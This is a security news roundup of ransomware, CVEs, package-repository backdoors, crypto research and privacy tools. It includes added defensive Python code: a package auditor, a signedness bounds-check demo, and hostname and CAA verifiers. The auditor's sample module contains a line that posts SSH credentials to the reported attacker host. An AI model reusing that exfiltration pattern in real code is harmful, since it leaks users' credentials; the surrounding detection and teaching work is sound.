The first ransomware to use the new Process Doppelgänging fileless code injection technique has been spotted. It works on all modern versions of Microsoft Windows, from Vista onwards. This variant of the known SynAck ransomware uses NTFS transactions (TxF): the payload is written into a legitimate executable inside a transaction, a process is created from that image, and the transaction is then rolled back, so the malicious process runs under the name of a legitimate file that remains unmodified on disk.
Security researchers from the Dutch information security company Computest have found that some Volkswagen and Audi cars are vulnerable to remote hacking. They were able to exploit the vehicles' infotainment systems; an attacker could track the car's location and listen in on conversations inside it.
Twitter found a bug that stored user passwords unmasked in an internal log. There is no indication of a breach, but all Twitter users should change their passwords.
A breakthrough cryptanalytic attack on 5-round AES with a data complexity of only 2^22 (the previous best needed 2^32) was presented at CRYPTO 2018. It is joint work by Nathan Keller, Achiya Bar-On, Orr Dunkelman, Eyal Ronen and Adi Shamir. Attacks of this kind are useful for evaluating the security margin of a cipher, but this one has no real-world implications, since production AES uses at least 10 rounds.
A bug hunter who found multiple vulnerabilities in 7-Zip, whose code is also used by anti-virus vendors, wrote a blog post on how to exploit one of these bugs. Interesting read.
The 360 Core Security response team detected an APT attack exploiting a zero-day and captured what they describe as the world's first malicious sample using a browser zero-day (CVE-2018-8174). It is a remote code execution vulnerability in the Windows VBScript engine and affects the latest version of Internet Explorer.
Microsoft patched this vulnerability a few days ago and credited the Chinese researchers.
The source code of the TreasureHunter point-of-sale malware has leaked online.
The ssh-decorator package on PyPI (installable via pip) contained an obvious backdoor: it sent the target IP, login and password to ssh-decorate[.]cf over cleartext HTTP.
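A pre-install check of the kind this incident calls for, added here as an example (it is not the page's code, nor pip's or PyPI's): it parses a package's Python sources with the ast module and reports HTTP-client imports and calls plus any cleartext http:// URL literal, so a module that posts credentials to an unfamiliar host stands out before `pip install` ever runs its setup.py. The two module texts below are constructed for the demonstration and only model the reported behaviour; the hostname ssh-decorate.cf is the one named above, the URL path, function and variable names are assumptions.

```python
import ast
from pathlib import Path
from typing import Iterator, List, Tuple
from urllib.parse import urlsplit

Finding = Tuple[int, str]  # (line number, reason)

# Modules and calls that mean "this code talks to an HTTP server". A library
# that wraps paramiko for SSH has no legitimate reason to touch any of them.
HTTP_MODULES = {"urllib", "urllib2", "urllib3", "requests", "http", "httplib"}
HTTP_CALLS = {"urlopen", "urlretrieve", "Request", "request", "get", "post",
              "put", "HTTPConnection", "HTTPSConnection"}


def _dotted(node: ast.AST) -> str:
    """Render an attribute chain such as urllib.request.urlopen to a string."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def audit_source(source: str, filename: str = "<module>") -> List[Finding]:
    """Flag HTTP-client imports, HTTP-client calls and cleartext http:// URLs.

    A call reached through a bare name (from urllib.request import urlopen)
    is not matched here, but the import that brought it in is.
    """
    findings: List[Finding] = []
    for node in ast.walk(ast.parse(source, filename)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in HTTP_MODULES:
                    findings.append((node.lineno, f"imports HTTP module {alias.name}"))
        elif isinstance(node, ast.ImportFrom) and node.module:
            if node.module.split(".")[0] in HTTP_MODULES:
                findings.append((node.lineno, f"imports HTTP module {node.module}"))
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            root, leaf = name.split(".")[0], name.split(".")[-1]
            if root in HTTP_MODULES and leaf in HTTP_CALLS:
                findings.append((node.lineno, f"HTTP call {name}()"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            try:
                url = urlsplit(node.value)
            except ValueError:
                continue  # not a URL at all
            if url.scheme == "http" and url.hostname:
                findings.append((node.lineno, f"cleartext URL to {url.hostname}"))
    return findings


def audit_tree(root: Path) -> Iterator[Tuple[Path, Finding]]:
    """Run audit_source over every .py file of an unpacked sdist or wheel."""
    for path in sorted(root.rglob("*.py")):
        text = path.read_text(encoding="utf-8", errors="replace")
        for finding in audit_source(text, str(path)):
            yield path, finding


# Constructed sample modelling the reported behaviour (not the real package code).
SAMPLE_BACKDOORED = '''
import paramiko
import urllib.request, urllib.parse

def connect(host, user, password):
    creds = urllib.parse.urlencode({"ip": host, "login": user, "password": password})
    urllib.request.urlopen("http://ssh-decorate.cf/", data=creds.encode())  # phones home
    return paramiko.SSHClient()
'''

# Constructed sample of what an SSH helper should look like: no HTTP at all.
SAMPLE_CLEAN = '''
import paramiko

def connect(host, user, password):
    client = paramiko.SSHClient()
    client.connect(host, username=user, password=password)
    return client
'''

if __name__ == "__main__":
    for line, reason in audit_source(SAMPLE_BACKDOORED):
        print(f"line {line}: {reason}")
```

Run `audit_tree(Path("ssh_decorator-0.1"))` over the directory produced by `pip download --no-binary :all:` plus `tar xf`; any finding in a package whose job is SSH deserves a look at the line before installing. The check is a triage aid, not a proof of absence: obfuscated or dynamically built imports will not be caught.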
Luke Picciau wrote about his experience with Matrix and its Riot messenger after one year of use.
The first official 1.0 release candidate of Briar for Android is out.
Briar is an open-source, end-to-end encrypted, decentralized mesh-networking messaging application that communicates over Bluetooth, Wi-Fi or Tor.
The Infection Monkey is an open-source security tool for testing a data center's resilience to perimeter breaches and internal server infection.
There is a critical flaw in the Microsoft Malware Protection Engine (CVE-2018-0986). Microsoft reused the open-source unrar code but changed the signedness of its integers throughout, which broke the bounds checks. The result is remote memory corruption in a process running as SYSTEM.
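The bug class in play, illustrated with an added example that is not the MMPE or unrar code: a bounds check written for one signedness silently stops working when the type changes. Here a 32-bit length field is read both ways with struct ('I' and 'i'), because Python integers have no fixed width; the version with the signed read and the old single-sided check accepts 0xFFFFFFF0 as -16, and the span it computes ends before it begins, which in C is an out-of-bounds read or write. The record layout (a 4-byte little-endian length followed by the payload) is an assumption made for the demonstration.

```python
import struct
from typing import Optional, Tuple

# (start, end) of the accepted payload within the buffer, or None if rejected.
Span = Optional[Tuple[int, int]]


def payload_span_unsigned(buf: bytes, pos: int) -> Span:
    """Length field read as uint32 (the original type): one upper-bound check
    is sufficient, because an unsigned value can never be below zero."""
    (n,) = struct.unpack_from("<I", buf, pos)
    remaining = len(buf) - pos - 4
    if n > remaining:
        return None
    return (pos + 4, pos + 4 + n)


def payload_span_signed_broken(buf: bytes, pos: int) -> Span:
    """Same check after the field became int32. The bytes FF FF FF F0 now read
    as -16, pass `n > remaining`, and the computed end lies *before* the start:
    the copy loop that follows in C walks outside the buffer."""
    (n,) = struct.unpack_from("<i", buf, pos)
    remaining = len(buf) - pos - 4
    if n > remaining:
        return None
    return (pos + 4, pos + 4 + n)


def payload_span_signed_fixed(buf: bytes, pos: int) -> Span:
    """The repair once the type is signed: reject both directions explicitly."""
    (n,) = struct.unpack_from("<i", buf, pos)
    remaining = len(buf) - pos - 4
    if n < 0 or n > remaining:
        return None
    return (pos + 4, pos + 4 + n)


# Constructed records: 4-byte little-endian length, then 8 payload bytes.
BENIGN = struct.pack("<I", 8) + b"A" * 8
HOSTILE = struct.pack("<I", 0xFFFFFFF0) + b"A" * 8   # reads as -16 when signed

if __name__ == "__main__":
    for name, fn in [("unsigned", payload_span_unsigned),
                     ("signed/broken", payload_span_signed_broken),
                     ("signed/fixed", payload_span_signed_fixed)]:
        print(f"{name:14} benign={fn(BENIGN, 0)} hostile={fn(HOSTILE, 0)}")
```

When reviewing a port or fork that touched integer types, grep for every comparison involving the changed variables: each `x > limit` needs a matching `x < 0` once `x` can be negative, and each `x < 0` becomes dead code once `x` is unsigned.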
A blog post by Latacora about the right choices and parameters for cryptography in backups, communication, authentication and so on. A nice summary, with explanations and historical references.
The Italian football club Lazio was scammed by a social engineering attack via email: the club paid a €2 million transfer installment into a fraudster's bank account instead of that of the Dutch club Feyenoord.
The people behind Google's Project Wycheproof, which tests crypto libraries against known attacks, released test vectors for many crypto primitives.
Cloudflare announced a consumer DNS resolver at 1.1.1.1. It supports DNS-over-TLS as well as DNS-over-HTTPS.
A good explanatory blog post about Oblivious DNS and why DNS should not require us to trust the resolver at all.
There is a local privilege escalation vulnerability (CVE-2018-0492) in the Debian beep package. Yes, the beep package that makes the motherboard speaker beep. The escalation works because beep is installed setuid root and contains a race condition.
LibreSSL 2.7.0 accepted all invalid host names as valid. The bug was found by Python maintainer Christian Heimes when running the test suite after porting Python 3.7 to the new LibreSSL. Nobody was affected.
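The check that such a test suite exercises, written out as an added example (not LibreSSL's or CPython's code): a hostname matcher for dNSName and iPAddress SANs following RFC 6125 with the strict wildcard rules common TLS stacks apply. The point of a test like Python's is that every invalid name in the list below is rejected, which is exactly what 2.7.0 failed to do. All names and addresses are constructed for the demonstration.

```python
import ipaddress
from typing import Iterable


def _is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def dns_name_matches(presented: str, reference: str) -> bool:
    """Compare one dNSName SAN from a certificate with the host we connected to.

    Rules (RFC 6125 section 6.4.3, with the stricter wildcard handling most
    TLS stacks apply): case-insensitive label comparison, a wildcard only as
    the complete leftmost label, never spanning a dot, never for a name with
    fewer than two labels after it, and never matching an IP address.
    """
    presented = presented.strip().lower().rstrip(".")
    reference = reference.strip().lower().rstrip(".")
    if not presented or not reference or _is_ip_literal(reference):
        return False
    p_labels = presented.split(".")
    r_labels = reference.split(".")
    if "" in p_labels or "" in r_labels:          # "a..b" style garbage
        return False
    if "*" not in presented:
        return p_labels == r_labels
    if p_labels[0] != "*" or any("*" in lbl for lbl in p_labels[1:]):
        return False                               # partial or non-leftmost wildcard
    if len(p_labels) < 3:
        return False                               # "*" or "*.com"
    return len(p_labels) == len(r_labels) and p_labels[1:] == r_labels[1:]


def ip_matches(presented_ip: str, reference: str) -> bool:
    """iPAddress SANs compare as addresses, so 2001:db8::1 equals 2001:DB8:0:0::1."""
    try:
        return ipaddress.ip_address(presented_ip) == ipaddress.ip_address(reference)
    except ValueError:
        return False


def hostname_verified(dns_sans: Iterable[str], ip_sans: Iterable[str], reference: str) -> bool:
    """True if any SAN in the certificate legitimately covers `reference`.
    An IP literal is only ever matched against iPAddress SANs, never dNSName."""
    if _is_ip_literal(reference):
        return any(ip_matches(ip, reference) for ip in ip_sans)
    return any(dns_name_matches(name, reference) for name in dns_sans)


# Constructed cases a verifier's test suite should contain (expected result in the tuple).
CASES = [
    ("example.org", "EXAMPLE.org.", True),
    ("*.example.org", "www.example.org", True),
    ("*.example.org", "a.b.example.org", False),   # wildcard must not span a dot
    ("*.example.org", "example.org", False),       # wildcard does not match the bare domain
    ("www*.example.org", "www1.example.org", False),
    ("*.org", "example.org", False),
    ("example.org", "examp1e.org", False),
    ("10.0.0.1", "10.0.0.1", False),               # IPs do not belong in dNSName
]


def all_cases_pass() -> bool:
    return all(dns_name_matches(p, r) is expected for p, r, expected in CASES)
```

A TLS library port is worth gating on exactly this kind of table: the negative cases are the ones that catch a verifier which has quietly started returning success for everything.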
VirusTotal launched a new Android sandbox, VirusTotal Droidy, to help security researchers detect malicious apps through behavioral analysis.
MesaLink is a new memory-safe and OpenSSL-compatible TLS library written in Rust.
The notorious Necurs spam botnet is sending millions of spam emails pumping a shitcoin cryptocurrency named Swisscoin. The attackers are probably invested in it and expect to run a pump-and-dump scheme.
A nice article on Russia's hacking capabilities against foreign critical infrastructure.
Taiwanese police handed out malware-infected USB sticks as prizes for a cybersecurity quiz. The malware was an old sample trying to contact a no-longer-existing C&C server in Poland. The thumb drives had been infected by a third-party contractor.
New research analyzes the adoption of Certification Authority Authorization (CAA) DNS records. CAA records let domain owners state explicitly which certificate authorities may issue certificates for their domain. Only 4 of the large DNS operators that dominate the Internet's DNS infrastructure let their customers configure CAA records, though things are improving after this audit.
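How a CA is meant to evaluate those records, as an added example (not from the research or any CA's code): the RFC 8659 lookup climbs the DNS tree to the closest CAA RRset, lets issuewild override issue for wildcard requests, refuses on an issuer-critical property it does not understand, and compares the CA's identifier against the authorised issuer domains. The zone contents and the CA identifiers ca-one.example and ca-two.example are constructed for the demonstration; CNAME/DNAME chasing is left out.

```python
from dataclasses import dataclass
from typing import Dict, List

ISSUER_CRITICAL = 0x80                     # bit 7 of the CAA flags byte
KNOWN_TAGS = {"issue", "issuewild", "iodef"}


@dataclass(frozen=True)
class CAA:
    flags: int
    tag: str
    value: str


def relevant_rrset(zone: Dict[str, List[CAA]], fqdn: str) -> List[CAA]:
    """RFC 8659 section 3: the CAA RRset of the name itself or, failing that,
    of the closest ancestor that has one. Returns [] if none exists."""
    labels = fqdn.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        rrset = zone.get(".".join(labels[i:]), [])
        if rrset:
            return rrset
    return []


def _authorized_issuer(value: str) -> str:
    """'ca.example; accounturi=...' -> 'ca.example'; ';' or '' -> '' (no CA at all)."""
    return value.split(";", 1)[0].strip().lower()


def may_issue(zone: Dict[str, List[CAA]], fqdn: str, ca_id: str,
              wildcard: bool = False) -> bool:
    """Decide whether the CA identified by ca_id may issue for fqdn (or *.fqdn)."""
    rrset = relevant_rrset(zone, fqdn)
    if not rrset:
        return True                        # no CAA anywhere in the tree: unrestricted
    # An issuer-critical property the CA does not understand forbids issuance.
    if any(r.flags & ISSUER_CRITICAL and r.tag.lower() not in KNOWN_TAGS for r in rrset):
        return False
    tag = "issue"
    if wildcard and any(r.tag.lower() == "issuewild" for r in rrset):
        tag = "issuewild"                  # issuewild, when present, governs *.names
    governing = [r for r in rrset if r.tag.lower() == tag]
    if not governing:
        return True                        # e.g. an iodef-only RRset restricts nothing
    allowed = {_authorized_issuer(r.value) for r in governing} - {""}
    return ca_id.lower() in allowed


# Constructed zone data (the accounturi parameter is RFC 8657's; the values are made up).
ZONE = {
    "example.com": [
        CAA(0, "issue", "ca-one.example; accounturi=https://ca-one.example/acct/42"),
        CAA(0, "issuewild", ";"),          # nobody may issue wildcard certs
        CAA(0, "iodef", "mailto:security@example.com"),
    ],
    "locked.example.com": [CAA(0, "issue", ";")],
    "odd.example.com": [CAA(ISSUER_CRITICAL, "future-tag", "whatever")],
    "report-only.example.com": [CAA(0, "iodef", "mailto:security@example.com")],
}

if __name__ == "__main__":
    for name, wild in [("www.example.com", False), ("example.com", True),
                       ("locked.example.com", False), ("example.org", False)]:
        print(f"{'*.' if wild else ''}{name}: ca-one -> {may_issue(ZONE, name, 'ca-one.example', wild)}")
```

The record that matters for an audit like the one above is `issue` at the apex: without it, the tree walk finds nothing and every CA is permitted, which is the default the research measured.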
Lenovo engineers have discovered a backdoor affecting RackSwitch and BladeCenter switches running ENOS (Enterprise Network Operating System). The company has already released firmware updates.
The backdoor was added to the source code in 2004, when the code base was maintained by Nortel.
A nice technical report on PowerStager, the Python/C/PowerShell malware used in the Pyeongchang Olympics themed spear-phishing attack.
SfyLabs researchers discovered a new Android banking Trojan named Red Alert 2.0 that is being offered for rent on several dark web sites. It uses Twitter as a fallback channel for command-and-control communication.
The Windows cleanup utility CCleaner, distributed by antivirus vendor Avast, contained the multi-stage Floxif malware.
According to the Slovak CSIRT, multiple packages in the PyPI Python repository were hit by a typosquatting attack.
Medfusion 4000 Wireless Syringe Infusion Pumps, used in acute critical care settings, could be remotely controlled, with potentially fatal consequences for patients.
Kaspersky researchers discovered a new attack technique leveraging an undocumented Microsoft Word feature to load PHP scripts hosted on third-party web servers.
DigitalOcean warned that some of its pre-built, pre-configured (One-Click) application images use default admin passwords.
A use-after-free bug in the Apache HTTP Server can leak pieces of arbitrary server memory through the Allow header of an OPTIONS response. It is tracked as CVE-2017-9798 and nicknamed "Optionsbleed".
Mr. SIP is a tool developed to audit and simulate SIP-based attacks.
MalwareMustDie analyzed a new APT campaign delivering the Poison Ivy RAT. The malware uses obfuscated VBScript and PowerShell to finally drop the well-known RAT.
"The concept of infection is fileless, it's avoiding known signature for detection by multiple encodings and wraps, and it is also 100% avoiding the original attacker's working territory."
A fake Chrome browser app named "Betaling - Google Chrome.exe" is spreading, mainly in the Netherlands. The application mimics basic browser functionality in order to steal users' credit card information.
A conspiracy theory is circulating around the car crash that killed journalist Michael Hastings. According to San Diego 6 News, Hastings had been investigating CIA Director John Brennan. He had also contacted WikiLeaks lawyer Jennifer Robinson just a few hours before he died, telling her that federal agents were investigating his work. Was his vehicle remotely hijacked?
Trend Micro has uncovered MajikPOS, new point-of-sale (PoS) malware with RAT functionality. MajikPOS mainly targets businesses in the United States and Canada. It spreads via poorly secured VNC and RDP services.
Avast malware researcher Jakub Kroustek discovered the Kirk ransomware, new Star Trek themed ransomware written in Python, probably the first to use Monero as its ransom payment of choice.
Researchers at the Pwn2Own competition exploited the Microsoft Edge browser in a way that escaped the VMware Workstation virtual machine it was running in.
Three different exploits chained in a row.
A very interesting article about the history of US information warfare.
"The United States was birthed in a stew of information, misinformation, disinformation, and propaganda projected by competing entities both internally and externally. Thus, instead of looking at the apparent success of Russian intelligence in the recent election as the perfected form of information warfare, it is worth considering colonial and revolutionary America to appreciate the historical precedent and perspective"
Intel Security has released CHIPSEC, a security framework able to evaluate whether the system firmware has been modified.
Intel also launched its first-ever bug bounty program.